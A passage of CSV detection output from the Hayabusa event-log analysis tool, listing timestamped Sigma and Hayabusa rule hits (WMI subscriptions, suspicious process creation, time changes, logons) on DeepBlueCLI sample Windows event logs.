Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : 
Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed 
Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 
07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 